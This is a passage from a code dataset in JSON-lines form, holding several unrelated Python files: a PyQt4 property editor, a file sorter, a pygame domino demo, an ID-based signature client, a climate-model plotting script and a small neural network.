self.actions: Dict[int, Tuple[ActionType, Any]] = {c: (ActionType.NONE, None)\n for c in self.graph.get_customers()}\n self.__time_step = self.graph.get_time_step()\n self.__performed = False\n\n @classmethod\n def empty_action(cls, graph):\n return cls(graph)\n\n def get_time_step(self):\n return self.__time_step\n\n def get_performed(self):\n return self.__performed\n\n def get_action_type(self, node_id: int):\n return self.actions[node_id][0]\n\n def set_bribed(self, node_id: int, briber_ids: List[int]):\n self.actions[node_id] = (ActionType.BRIBED, briber_ids)\n\n def set_none(self, node_id: int):\n self.actions[node_id] = (ActionType.NONE, 0)\n\n def set_select(self, node_id: int, briber_id):\n self.actions[node_id] = (ActionType.SELECT, briber_id)\n\n def set_bribed_from_bribery_action(self, bribery_action: BriberyAction):\n for c in self.actions:\n bribed, bribers = bribery_action.is_bribed(c)\n if bribed:\n self.set_bribed(c, bribers)\n\n # noinspection PyProtectedMember\n def perform_action(self, pay: float):\n \"\"\"\n Perform the described action on the graph\n :param pay: the amount to increase a selected briber's utility\n \"\"\"\n if not self.__performed:\n if self.__time_step == self.graph.get_time_step():\n for c in self.actions:\n if self.actions[c][0] == ActionType.SELECT:\n selected = self.actions[c][1]\n if np.isnan(self.graph._votes[c][selected]): # no previous vote or bribe\n self.graph._votes[c][selected] = self.graph._truths[c][selected]\n self.graph._bribers[selected].add_resources(pay)\n self.__performed = True\n else:\n message = f\"The time step of the TemporalRatingGraph ({self.graph.get_time_step()}) is not equal to \" \\\n f\"the intended execution time ({self.__time_step})\"\n raise CustomerActionTimeNotCorrectException(message)\n else:\n raise CustomerActionExecutedMultipleTimesException()\n","sub_path":"src/BribeNet/graph/temporal/action/customerAction.py","file_name":"customerAction.py","file_ext":"py","file_size_in_byte":3268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"576383851","text":"#\n# Project: MXCuBE\n# https://github.com/mxcube.\n#\n# This file is part of MXCuBE software.\n#\n# MXCuBE is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# MXCuBE is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with MXCuBE. If not, see .\n\nimport os\nimport types\nimport weakref\nimport logging\n\nfrom PyQt4 import QtCore\nfrom PyQt4 import QtGui\n\nimport PropertyBag\nfrom BlissFramework import Qt4_Icons\n\ntry:\n from PyQt4.QtCore import QStringList\nexcept:\n QtCore.QStringList = list\n\n\nclass Qt4_ConfigurationTable(QtGui.QTableWidget):\n \"\"\"\n Descript. :\n \"\"\"\n\n def __init__(self, parent):\n \"\"\"\n Descript. :\n \"\"\"\n QtGui.QTableWidget.__init__(self, parent)\n\n self.setObjectName(\"configurationTable\")\n self.setFrameShape(QtGui.QFrame.StyledPanel)\n self.setFrameShadow(QtGui.QFrame.Sunken)\n self.setContentsMargins(0, 3, 0, 3)\n self.setColumnCount(3)\n self.setSelectionMode(QtGui.QTableWidget.NoSelection)\n\n self.setHorizontalHeaderLabels([self.trUtf8('Properties'), \n self.trUtf8('Values'), \n self.trUtf8('')])\n \n self.setSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Expanding)\n self.propertyBag = None\n\n self.cellChanged.connect(self.OnCellChanged)\n \n def clear(self):\n \"\"\"\n Descript. :\n \"\"\"\n for i in range(self.rowCount()):\n self.removeRow(i)\n self.setRowCount(0)\n self.propertyBag = None\n\n \n def setPropertyBag(self, propertyBag, showHidden=False):\n \"\"\"\n Descript. :\n \"\"\"\n self.clear() \n if self.propertyBag is not None:\n for prop in self.propertyBag:\n prop._editor = None\n\n self.propertyBag = propertyBag\n\n if self.propertyBag is not None:\n self.setRowCount(len(self.propertyBag))\n \n i = 0\n self.setRowCount(len(self.propertyBag))\n for prop in self.propertyBag:\n prop._editor = weakref.ref(self)\n \n if not showHidden and prop.hidden:\n continue\n\n tempTableItem = QtGui.QTableWidgetItem(prop.getName())\n tempTableItem.setFlags(QtCore.Qt.ItemIsEnabled)\n self.blockSignals(True) \n self.setItem(i, 0, tempTableItem)\n self.setWidgetFromProperty(i, prop)\n self.blockSignals(False)\n \n validationPanel = ValidationTableItem(self)\n self.setCellWidget(i, 2, validationPanel)\n validationPanel.OK.clicked.connect(self.OnValidateClick)\n validationPanel.Cancel.clicked.connect(self.OnInvalidateClick)\n validationPanel.Reset.clicked.connect(self.OnResetClick)\n i += 1\n #self.setRowCount(i)\n self.resizeColumnsToContents() \n \n def setWidgetFromProperty(self, row, prop):\n \"\"\"\n Descript. :\n \"\"\"\n if prop.getType() == 'boolean':\n newPropertyItem = QtGui.QTableWidgetItem(QtCore.QString(\"\"))\n self.setItem(row, 1, newPropertyItem)\n if prop.getUserValue():\n self.item(row, 1).setCheckState(QtCore.Qt.Checked)\n else:\n self.item(row, 1).setCheckState(QtCore.Qt.Unchecked)\n elif prop.getType() == 'combo':\n choicesList = QtCore.QStringList()\n choices = prop.getChoices()\n for choice in choices:\n choicesList.append(choice)\n newPropertyItem = ComboBoxTableItem(self, row, 1, choicesList)\n newPropertyItem.setCurrentIndex(newPropertyItem.findText(prop.getUserValue()))\n self.setCellWidget(row, 1, newPropertyItem)\n elif prop.getType() == 'file':\n newPropertyItem = FileTableItem(self, row, 1, prop.getUserValue(), prop.getFilter())\n self.setCellWidget(row, 1, newPropertyItem)\n elif prop.getType() == 'color':\n newPropertyItem = ColorTableItem(self, row, 1, prop.getUserValue())\n self.setCellWidget(row, 1, newPropertyItem)\n else: \n if prop.getUserValue() is None:\n tempTableItem = QtGui.QTableWidgetItem(\"\")\n else:\n tempTableItem = QtGui.QTableWidgetItem(str(prop.getUserValue())) \n self.setItem(row, 1, tempTableItem)\n\n def OnCellChanged(self, row, col):\n \"\"\"\n Descript. :\n \"\"\"\n col += 1\n\n item_property = self.propertyBag.getProperty(str(self.item(row, 0).text()))\n oldValue = item_property.getUserValue()\n\n if item_property.getType() == 'boolean':\n item_property.setValue(self.item(row, 1).checkState())\n elif item_property.getType() == 'combo':\n item_property.setValue(self.cellWidget(row, 1).currentText())\n elif item_property.getType() == 'file':\n item_property.setValue(self.cellWidget(row, 1).get_filename())\n elif item_property.getType() == 'color':\n item_property.setValue(self.cellWidget(row, 1).color)\n else: \n try:\n item_property.setValue(str(self.item(row, 1).text()))\n except:\n logging.getLogger().error('Cannot assign value %s to property %s' % \\\n (str(self.item(row, 1).text()), item_property.getName()))\n\n if item_property.getUserValue() is None:\n self.item(row, 1).setText('')\n else:\n self.item(row, 1).setText(str(item_property.getUserValue()))\n\n if not oldValue == item_property.getUserValue():\n self.emit(QtCore.SIGNAL('propertyChanged'), item_property.getName(), \n oldValue, item_property.getUserValue())\n\n def OnValidateClick(self):\n \"\"\"\n Descript. :\n \"\"\"\n self.endEdit(self.currentRow(), 1, 1, 0) #current row, col 1, accept = 1, replace = 0\n self.activateNextCell()\n \n def OnInvalidateClick(self):\n \"\"\"\n Descript. :\n \"\"\"\n self.endEdit(self.currentRow(), 1, 0, 0) #current row, col 1, accept = 0, replace = 0\n\n def OnResetClick(self):\n \"\"\"\n Descript. :\n \"\"\"\n self.endEdit(self.currentRow(), 1, 0, 0)\n\n property = self.propertyBag.getProperty(str(self.text(self.currentRow(), 0)))\n\n defaultValue = property.getDefaultValue()\n if not defaultValue == None:\n property.setValue(defaultValue)\n \n self.setWidgetFromProperty(self.currentRow(), property)\n\n def beginEdit(self, row, col, replace):\n \"\"\"\n Descript. :\n \"\"\"\n if col == 1 and row >= 0:\n self.item(row, 2).setEnabled(1)\n \n return QTable.beginEdit(self, row, col, replace)\n\n def endEdit(self, row, col, accept, replace):\n \"\"\"\n Descript. :\n \"\"\"\n if col == 1 and row >= 0:\n self.item(row, 2).setEnabled(0)\n\n if accept:\n prop = self.propertyBag.getProperty(str(self.text(row, 0)))\n\n oldValue = prop.getUserValue()\n \n if prop.getType() == 'boolean':\n prop.setValue(self.item(row, 1).isChecked())\n elif prop.getType() == 'combo':\n prop.setValue(self.item(row, 1).currentText())\n else: \n try:\n prop.setValue(str(self.text(row, 1)))\n except:\n logging.getLogger().error('Cannot assign value to property')\n\n if prop.getUserValue() is None:\n self.setText(row, 1, '')\n else:\n self.setText(row, 1, str(prop.getUserValue()))\n\n if not oldValue == prop.getUserValue():\n self.emit(QtCore.SIGNAL('propertyChanged'), (property.getName(), oldValue, property.getUserValue(), ))\n\n return QTable.endEdit(self, row, col, accept, replace)\n\n\nclass ValidationTableItem(QtGui.QWidget):\n \"\"\"\n Descript. :\n \"\"\"\n\n def __init__(self, parent=None):\n \"\"\"\n Descript. : parent (QTreeWidget) : Item's QTreeWidget parent.\n \"\"\"\n\n QtGui.QWidget.__init__(self, parent)\n \n self.OK = QtGui.QToolButton(parent)\n self.OK.setAutoRaise(True)\n self.OK.setIcon(QtGui.QIcon(Qt4_Icons.load('button_ok_small'))) #QPixmap(Icons.tinyOK)))\n self.Cancel = QtGui.QToolButton(parent)\n self.Cancel.setAutoRaise(True)\n self.Cancel.setIcon(QtGui.QIcon(Qt4_Icons.load('button_cancel_small'))) #QPixmap(Icons.tinyCancel)))\n self.Reset = QtGui.QToolButton(parent)\n self.Reset.setIcon(QtGui.QIcon(Qt4_Icons.load('button_default_small'))) #QPixmap(Icons.defaultXPM)))\n self.Reset.setAutoRaise(True)\n self.setEnabled(False)\n\n main_layout = QtGui.QHBoxLayout()\n main_layout.addWidget(self.OK)\n main_layout.addWidget(self.Cancel)\n main_layout.addWidget(self.Reset)\n main_layout.setSpacing(0)\n main_layout.setContentsMargins(0,0,0,0)\n self.setLayout(main_layout)\n\n def setEnabled(self, enabled):\n \"\"\"\n Descript. :\n \"\"\"\n if enabled:\n self.Reset.setEnabled(True)\n self.OK.setEnabled(True)\n self.Cancel.setEnabled(True)\n else:\n self.Reset.setEnabled(False)\n self.OK.setEnabled(False)\n self.Cancel.setEnabled(False)\n\nclass ComboBoxTableItem(QtGui.QComboBox):\n \"\"\"\n Descript. :\n \"\"\"\n\n def __init__(self, parent, row, col, items_list = None):\n \"\"\" \n Descript. :\n \"\"\"\n QtGui.QComboBox.__init__(self)\n if items_list is not None:\n self.addItems(items_list) \n self.col = col\n self.row = row \n self.parent = parent\n QtCore.QObject.connect(self, QtCore.SIGNAL('currentIndexChanged(int)'), self.current_index_changed)\n\n def current_index_changed(self, index): \n \"\"\"\n Descript. :\n \"\"\"\n self.parent.emit(QtCore.SIGNAL('cellChanged(int, int)'), self.row, self.col) \n\nclass FileTableItem(QtGui.QWidget):\n \"\"\"\n Descript. :\n \"\"\"\n\n def __init__(self, parent, row, col, filename, file_filter):\n \"\"\"\n Descript. :\n \"\"\"\n QtGui.QWidget.__init__(self)\n\n self.file_filter = file_filter\n self.parent = parent\n self.col = col\n self.row = row\n\n self.cmdBrowse = QtGui.QPushButton('Browse', self.parent.viewport())\n\n main_layout = QtGui.QHBoxLayout()\n main_layout.addWidget(self.cmdBrowse)\n main_layout.setSpacing(0)\n main_layout.setContentsMargins(0,0,0,0)\n self.setLayout(main_layout) \n\n QtCore.QObject.connect(self.cmdBrowse, QtCore.SIGNAL('clicked()'), self.browse_clicked) \n self.set_filename(filename)\n\n def set_filename(self, filename):\n \"\"\"\n Descript. :\n \"\"\"\n self.filename = str(filename)\n\n if self.cmdBrowse is not None:\n self.cmdBrowse.setToolTip(self.filename)\n\n self.parent.emit(QtCore.SIGNAL('cellChanged(int, int)'), self.row, self.col)\n\n def get_filename(self):\n \"\"\"\n Descript. :\n \"\"\"\n return self.filename \n \n def browse_clicked(self):\n \"\"\"\n Descript. :\n \"\"\"\n new_filename = QtGui.QFileDialog.getOpenFileName(\n self, os.path.dirname(self.filename) or os.getcwd(), \n self.file_filter, '', 'Select a file')\n \n if len(new_filename) > 0:\n self.set_filename(new_filename)\n\n \nclass ColorTableItem(QtGui.QWidget):\n \"\"\"\n Descript. :\n \"\"\"\n\n def __init__(self, parent, row, col, color):\n \"\"\"\n Descript. :\n \"\"\"\n QtGui.QTableWidget.__init__(self, parent)\n\n self.col = col\n self.row = row\n self.parent = parent\n\n self.cmdChangeColor = QtGui.QPushButton('Color...', parent)\n self.cmdResetColor = QtGui.QPushButton('reset', parent)\n\n main_layout = QtGui.QHBoxLayout()\n main_layout.addWidget(self.cmdChangeColor)\n main_layout.addWidget(self.cmdResetColor)\n main_layout.setSpacing(0)\n main_layout.setContentsMargins(0,0,0,0)\n self.setLayout(main_layout)\n\n self.cmdChangeColor.clicked.connect(self.cmdChangeColorClicked)\n self.cmdResetColor.clicked.connect(self.cmdResetColorClicked)\n self.setColor(color)\n\n #main_layout = QtGui.QVBoxLayout()\n #main_layout.addWidget(hbox) \n #self.setLayout(main_layout) \n\n def setColor(self, color):\n \"\"\"\n Descript. :\n \"\"\"\n try:\n rgb = color.rgb()\n except:\n try:\n self.qtcolor = QtGui.QColor(color)\n except:\n self.qtcolor = QtGui.QtColor(QtCore.Qt.green)\n self.color = self.qtcolor.rgb()\n else:\n self.color = self.qtcolor.rgb()\n else:\n self.qtcolor=color\n self.color=rgb\n\n if self.cmdChangeColor is not None: \n palette = self.cmdChangeColor.palette()\n palette.setColor(QtGui.QPalette.Button, self.qtcolor)\n #palette.setColor(QtGui.QPalette.Inactive, self.qtcolor)\n\n self.cmdChangeColor.setPalette(palette)\n # setStyleSheet(\"background-color: red\")\n #self.cmdChangeColor.setPaletteBackgroundColor(self.qtcolor)\n\n self.parent.emit(QtCore.SIGNAL('cellChanged(int, int)'), self.row, self.col)\n\n def cmdChangeColorClicked(self):\n \"\"\"\n Descript. :\n \"\"\"\n newColor = QtGui.QColorDialog.getColor(self.qtcolor or QtGui.QColor(\"white\"), None, 'Select a color')\n if newColor.isValid():\n self.setColor(newColor)\n\n def cmdResetColorClicked(self):\n \"\"\"\n Descript. :\n \"\"\"\n self.setColor(None)\n \n\nclass Dialog(QtGui.QDialog):\n \"\"\"\n Descript. :\n \"\"\"\n\n def __init__(self, propertyBag):\n \"\"\"\n Descript. :\n \"\"\"\n QtGui.QDialog.__init__(self, None, None, Qt.WDestructiveClose)\n\n self.setCaption(\"Configuration Editor\")\n self.propertiesTable = ConfigurationTable(self)\n self.propertiesTable.setPropertyBag(propertyBag)\n cmdClose = QPushButton('Close', self)\n \n self.connect(self.propertiesTable, PYSIGNAL('propertyChanged'), PYSIGNAL('propertyChanged'))\n self.connect(cmdClose, SIGNAL('clicked()'), self.close)\n\n QVBoxLayout(self, 0, 0)\n self.layout().setResizeMode(QLayout.FreeResize)\n self.layout().addWidget(self.propertiesTable)\n self.layout().addWidget(cmdClose)\n \n self.setFixedHeight(500)\n","sub_path":"Utils/Qt4_PropertyEditor.py","file_name":"Qt4_PropertyEditor.py","file_ext":"py","file_size_in_byte":15558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"5642644","text":"import sys\nimport os\nimport logging\n\nfrom errors import MemoryStarvationError\n\nlogging.basicConfig(\n level=logging.DEBUG,\n format='%(message)s'\n)\n\n\nclass Sorter:\n\n def __init__(self, max_size, input_file, output_file):\n self.max_size = max_size\n self.input_file = input_file\n self.output_file = output_file\n self.current_directory = os.getcwd()\n\n @staticmethod\n def get_file_location(self, file_name):\n file_location = self.current_directory + '\\\\' + file_name\n logging.debug('{} file is being processed'.format(file_location))\n return file_location\n\n # def create_temporary_folder(self):\n # path = self.current_directory + '\\\\' + 'temporary_folder'\n # logging.debug('Create temporary folder {}'.format(path))\n # os.mkdir(path)\n\n def shatter_file(self):\n input_file_location = self.get_file_location(self, self.input_file)\n with open(input_file_location) as input_file:\n trapped_memory_sum = 0\n temp_text_block = ''\n temp_block_number = 0\n for line in input_file:\n logging.debug('Handling line - {}'.format(line))\n trapped_memory_line = sys.getsizeof(line)\n\n if trapped_memory_line > self.max_size:\n raise MemoryStarvationError()\n\n if trapped_memory_sum + trapped_memory_line < self.max_size:\n temp_text_block += line\n continue\n\n else:\n temp_block_number += 1\n temp_block_name = 'temporary_file_' + str(temp_block_number)\n with open(temp_block_name, 'w') as t :\n t.write(temp_text_block)\n temp_text_block = ''\n continue\n\n temp_block_name = 'temporary_file_' + str(temp_block_number)\n with open(temp_block_name, 'w') as t:\n t.write(temp_text_block)\n\n\n\n","sub_path":"external_sort/sorter.py","file_name":"sorter.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"541798564","text":"import pygame, sys\nfrom pygame.locals import *\nfrom collections import Counter\n\nclass Boton(pygame.sprite.Sprite):\n\tdef __init__(self, imagen, imagenselected, x = 100, y= 100):\n\t\tself.imagen_normal = imagen\n\t\tself.imagen_seleccionada = imagenselected\n\t\tself.imagen_actual = self.imagen_normal\n\t\tself.rect = self.imagen_actual.get_rect()\n\t\tself.rect.left, self.rect.top = (x,y)\n\n\tdef update(self, pantalla, cursor):\n\t\tif cursor.colliderect(self.rect):\n\t\t\tself.imagen_actual = self.imagen_seleccionada\n\t\telse: \n\t\t\tself.imagen_actual = self.imagen_normal\n\t\tpantalla.blit(self.imagen_actual, self.rect)\n\nclass Cursor(pygame.Rect):\n\tdef __init__(self):\n\t\tpygame.Rect.__init__(self, 0, 0, 1, 1)\n\tdef update(self):\n\t\tself.left, self.top = pygame.mouse.get_pos()\n\n\ndef iniciar_domino():\n\tpygame.init()\n\n\tventana = pygame.display.set_mode((600,400))\n\tpygame.display.set_caption('Domino')\n\n\t#Tablero Domino\n\tFondo = pygame.transform.scale(pygame.image.load(\"images/fondomadera.jpg\"), [600, 400]).convert_alpha()\n\tventana.blit(Fondo,(0,0))\n\treloj = pygame.time.Clock()\n\t \n\t#fuente = pygame.font.Font(None, 30)\n\t#victoria = fuente.render(\"Juego Terminado\", 0, (255, 255, 255))\n\t#empate = fuente.render(\"Empate\", 0, (255, 255, 255))\n\n\t#Musica\n\tponerficha = pygame.mixer.Sound(\"sounds/colocar.wav\")\n\tponerrror = pygame.mixer.Sound(\"sounds/screem.wav\")\n\n\n\t#Cursor\n\tcursor = Cursor()\n\t#Botones\n\tfichadomino = pygame.transform.scale(pygame.image.load(\"images/0-0.png\"), [100, 40])\n\tfichadominoseleccionada = pygame.transform.scale(pygame.image.load(\"images/S-S.png\"), [100, 40])\n\n\tbotonFICHA= Boton(fichadomino, fichadominoseleccionada, 10, 75)\n\n\twhile True:\n\t\tfor event in pygame.event.get():\n\t\t\tif cursor.colliderect(botonFICHA.rect):\n\t\t\t\tponerficha.play()\n\t\t\t\tprint('Hola')\n\t\t\tif event.type == QUIT:\n\t\t\t\tpygame.quit()\n\t\t\t\tsys.exit()\n\t\treloj.tick(20)\n\t\tcursor.update()\n\t\tbotonFICHA.update(ventana, cursor)\n\t\tpygame.display.update()\niniciar_domino()\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"108487913","text":"import os\nimport sys\nimport os.path\nsys.path.append(os.path.join(os.getcwd(), '..',))\n\nimport client as clt\nfrom tools import *\nimport hashlib\nimport random\nimport base64\n\nID_SIGNATURE = \"/id-based-signature\"\nKEY_DIST_CENTER = \"/KDC\"\nP_KEY = \"/PK\"\nKEYGEN = \"/keygen\"\n\nKDC_GET_PK_URL = ID_SIGNATURE + KEY_DIST_CENTER + P_KEY\nKDC_GET_SK_URL = ID_SIGNATURE + KEY_DIST_CENTER + KEYGEN + NAME\nKDC_CHCK_URL = ID_SIGNATURE + \"/check/\" + NAME\n\nN = \"n\"\nE = \"e\"\nS = \"s\"\nT = \"t\"\nM = \"m\"\n\nSECRET_KEY = \"secret-key\"\n\ndef get_kdc_pub_key():\n srv = clt.Server(BASE_URL)\n try:\n param = srv.query(KDC_GET_PK_URL)\n return param[N], param[E]\n except clt.ServerError as err:\n print_serverError_exit(err)\n\ndef get_secret_key():\n srv = clt.Server(BASE_URL)\n try:\n return srv.query(KDC_GET_SK_URL)[SECRET_KEY]\n except clt.ServerError as err:\n print_serverError_exit(err)\n\ndef sign(s_key, n, e, message=\"yoloswag\"):\n msg_byte = message.encode()\n r = random.randint(1, n-1) \n t = pow(r, e, n)\n sha256 = hashlib.sha256()\n t_hex = \"{0:0512x}\".format(t)\n t_bytes = base64.b16decode(t_hex.encode(), casefold=True)\n m_t = msg_byte + t_bytes\n sha256.update(m_t)\n s = s_key * pow(r, int(sha256.hexdigest(), base=16), n) % n\n return {S:s, T:t, M: message} \n\nif __name__ == \"__main__\":\n n, e = get_kdc_pub_key()\n s_key = get_secret_key()\n r = random.randint(1, n -1)\n\n srv = clt.Server(BASE_URL)\n print(srv.query(KDC_CHCK_URL, sign(s_key, n, e)))\n","sub_path":"id-based-signature/id-based-signature.py","file_name":"id-based-signature.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"320298051","text":"from dataclasses import dataclass\n\nimport dataclass_factory\nfrom dataclass_factory import Schema\n\n\n@dataclass\nclass Book:\n title: str\n price: int\n author: str\n\n\ndata = {\n \"title\": \"Fahrenheit 451\",\n \"price\": 100,\n \"author\": [\"Ray Bradbury\"]\n}\n\nbook_schema = Schema(\n name_mapping={\n \"author\": (\"author\", 0)\n }\n)\nfactory = dataclass_factory.Factory(schemas={Book: book_schema})\n\n# Book(title=\"Fahrenheit 451\", price=100, author=\"Ray Bradbury\")\nbook: Book = factory.load(data, Book)\nserialized = factory.dump(book)\nassert serialized == data\n","sub_path":"docs/examples/flatten_list.py","file_name":"flatten_list.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"88561576","text":"#!/usr/bin/env python\n\n\"\"\"\nPlot visual benchmark (average seasonal cycle) of old vs new model runs.\n\nThat's all folks.\n\"\"\"\n__author__ = \"Martin De Kauwe\"\n__version__ = \"1.0 (18.10.2017)\"\n__email__ = \"mdekauwe@gmail.com\"\n\nimport xarray as xr\nimport matplotlib.pyplot as plt\nimport sys\nimport datetime as dt\nimport pandas as pd\nimport numpy as np\nfrom matplotlib.ticker import FixedLocator\nimport datetime\nimport os\nimport glob\nfrom optparse import OptionParser\n\ndef main(fname1, plot_fname=None, fpath=None):\n\n df1 = read_cable_file(fname1, type=\"CABLE\")\n #plt.plot(df1.plc)\n #plt.show()\n #sys.exit()\n df1 = resample_timestep(df1, type=\"CABLE\")\n #df1 = df1[(df1.index.hour >= 12) & (df1.index.hour < 13) &\n # (df1.index.minute < 30)].copy()\n\n fig = plt.figure(figsize=(9,6))\n fig.subplots_adjust(hspace=0.1)\n fig.subplots_adjust(wspace=0.2)\n plt.rcParams['text.usetex'] = False\n plt.rcParams['font.family'] = \"sans-serif\"\n plt.rcParams['font.sans-serif'] = \"Helvetica\"\n plt.rcParams['axes.labelsize'] = 12\n plt.rcParams['font.size'] = 12\n plt.rcParams['legend.fontsize'] = 12\n plt.rcParams['xtick.labelsize'] = 12\n plt.rcParams['ytick.labelsize'] = 12\n\n\n colours = plt.cm.Set2(np.linspace(0, 1, 7))\n\n ax1 = fig.add_subplot(1,1,1)\n\n\n axes = [ax1]\n\n vars = [\"plc\"]\n for a, v in zip(axes, vars):\n\n #a.plot(df1[v].index.to_pydatetime(), df1[v].rolling(window=7).mean(), c=colours[2],\n # lw=1.5, ls=\"-\", label=\"Hydraulics\")\n\n a.plot(df1[v].index.to_pydatetime(), df1[v], c=colours[2],\n lw=1.5, ls=\"-\")\n\n #x.bar(df_met.index, df_met[\"Rainf\"], alpha=0.3, color=\"black\")\n #ax1.set_ylim(0, 0.2)\n\n labels = [\"PLC (%)\"]\n for a, l in zip(axes, labels):\n a.set_ylabel(l, fontsize=12)\n\n #for x, l in zip(axes2, labels):\n # x.set_ylabel(\"Rainfall (mm d$^{-1}$)\", fontsize=12)\n\n\n #plt.setp(ax1.get_xticklabels(), visible=False)\n #ax1.legend(numpoints=1, loc=\"best\")\n\n\n #for a in axes:\n #a.set_xlim([datetime.date(2002,10,1), datetime.date(2003, 4, 1)])\n # a.set_xlim([datetime.date(2002,12,1), datetime.date(2003, 5, 1)])\n #a.set_xlim([datetime.date(2006,11,1), datetime.date(2007, 4, 1)])\n #a.set_xlim([datetime.date(2012,7,1), datetime.date(2013, 8, 1)])\n #a.set_xlim([datetime.date(2006,11,1), datetime.date(2007, 4, 1)])\n\n if fpath is None:\n fpath = \"./\"\n ofname = os.path.join(fpath, plot_fname)\n\n if plot_fname is None:\n plt.show()\n else:\n #fig.autofmt_xdate()\n fig.savefig(plot_fname, bbox_inches='tight', pad_inches=0.1)\n\n\ndef read_cable_file(fname, type=None):\n\n if type == \"CABLE\":\n vars_to_keep = ['plc']\n elif type == \"MET\":\n vars_to_keep = ['Rainf']\n\n ds = xr.open_dataset(fname, decode_times=False)\n\n time_jump = int(ds.time[1].values) - int(ds.time[0].values)\n if time_jump == 3600:\n freq = \"H\"\n elif time_jump == 1800:\n freq = \"30M\"\n else:\n raise(\"Time problem\")\n\n units, reference_date = ds.time.attrs['units'].split('since')\n df = ds[vars_to_keep].squeeze(dim=[\"x\",\"y\"], drop=True).to_dataframe()\n start = reference_date.strip().split(\" \")[0].replace(\"-\",\"/\")\n df['dates'] = pd.date_range(start=start, periods=len(df), freq=freq)\n df = df.set_index('dates')\n\n return df\n\n\n\ndef resample_timestep(df, type=None):\n\n UMOL_TO_MOL = 1E-6\n MOL_C_TO_GRAMS_C = 12.0\n SEC_2_HLFHOUR = 1800.\n\n if type == \"CABLE\":\n\n method = {\"plc\":\"max\"}\n elif type == \"FLUX\":\n # umol/m2/s -> g/C/30min\n df['GPP'] *= UMOL_TO_MOL * MOL_C_TO_GRAMS_C * SEC_2_HLFHOUR\n\n method = {'GPP':'sum', \"Qle\":\"mean\"}\n\n elif type == \"MET\":\n # kg/m2/s -> mm/30min\n df['Rainf'] *= SEC_2_HLFHOUR\n\n method = {'Rainf':'sum'}\n\n df = df.resample(\"D\").agg(method)\n\n return df\n\n\n return dates\n\nif __name__ == \"__main__\":\n\n fpath = \"/Users/mdekauwe/Desktop\"\n plot_fname = \"plc.png\"\n fname = \"outputs/hydraulics_root_1.0.nc\"\n main(fname, plot_fname, fpath)\n","sub_path":"experiment/plot_plc.py","file_name":"plot_plc.py","file_ext":"py","file_size_in_byte":4103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"44835325","text":"import numpy as np\nfrom sympy import *\nfrom sympy.abc import x\nimport copy\nimport random\n\ndef timer(fun):\n\n def inner(*args):\n t0 = time.time()\n result = fun(*args)\n t1 = time.time()\n\n print(f\"I did {fun.__name__} and it took me: {(t1 - t0) * 1000} miliseconds\")\n return result\n\n return inner\n\nclass Model():\n def __init__(self, layers, activation_function):\n self.act = activation_function\n self.act_der = lambdify(x, diff(self.act(x), x))\n self.l = np.array([ np.array([ 0.0 for _ in range(i) ]) for i in layers ])\n self.b = np.array([ np.array([random.random() for x in range(len(self.l[i])) ]) \\\n for i in range(len(self.l))])\n self.z = copy.deepcopy(self.l)\n self.d = copy.deepcopy(self.z)\n self.w = [ np.random.uniform(low=-1.0, high=1.0, size=(len(self.l[i+1]), \\\n len(self.l[i]))) for i in range(len(self.l) - 1) ]\n\n\n def predict(self, data_entry, verbose=False):\n self.l[0] = data_entry\n self.z[0] = data_entry\n\n for i in range(1, len(self.l)):\n\n self.z[i] = np.dot(self.w[i - 1], self.l[i - 1]) + self.b[i]\n self.l[i] = self.act(self.z[i])\n \n #NORMALIZATION\n _sum = sum(self.l[-1])\n self.l[-1] = self.l[-1]/_sum\n\n if verbose: \n s = ''\n for i, x in enumerate(self.l[-1]): s += f'{i+1:0}: {x:.2} '\n print(f\"I predicted these values:\\n{s}\")\n return self.l[-1]\n\n\n def backpropagation(self, inp, label):\n for i in range(len(self.l)-1 , -1, -1):\n\n self.predict(inp, verbose=False)\n\n if i == len(self.l) - 1:\n self.d[i] = (self.l[i] - label) * self.act_der(self.z[i])\n else:\n self.d[i] = np.dot(np.transpose(self.w[i]), self.d[i + 1]) * self.act_der(self.z[i])\n \n db = self.d\n dw = [ np.array([ self.l[j] * self.d[j+1][i] for i in range(len(self.d[j+1]))]) for j in range(len(self.w)) ]\n\n return dw, db\n\n \n def train(self, data, batch_size=1, step_size=0.1, iterations=1000, debug=False):\n for i in range(iterations):\n batch = random.sample(list(zip(data[0], data[1])), batch_size)\n\n c = step_size/batch_size\n\n for e in batch:\n dw, db = self.backpropagation(e[0], e[1])\n self.w = [ self.w[i] - dw[i] * c for i in range(len(dw))]\n self.b = self.b - db*c\n \n if debug: \n print(f\"Current interation: {i + 1}\")\n #print(f\"Current model: \\n{self}\")\n\n\n def generate_batch(self, data, batch_size):\n yield random.sample(data, batch_size)\n\n\n\n def serialize_model(self, filename):\n pass\n\n\n def __str__(self):\n sep = \"\\n\"\n s = f\"\\nWeights: {type(self.w)} \\n{sep.join(str(_w) for _w in self.w)} \\n\\nBias: \\\n {type(self.b)} \\n{sep.join(str(_b) for _b in self.b)} \\n\\nLayers: \\\n {type(self.l)}\\n{sep.join(str(_l) for _l in self.l)}\\n\\nZ: \\\n {type(self.z)}\\n{sep.join(str(_z) for _z in self.z)}\\n\"\n return s","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} 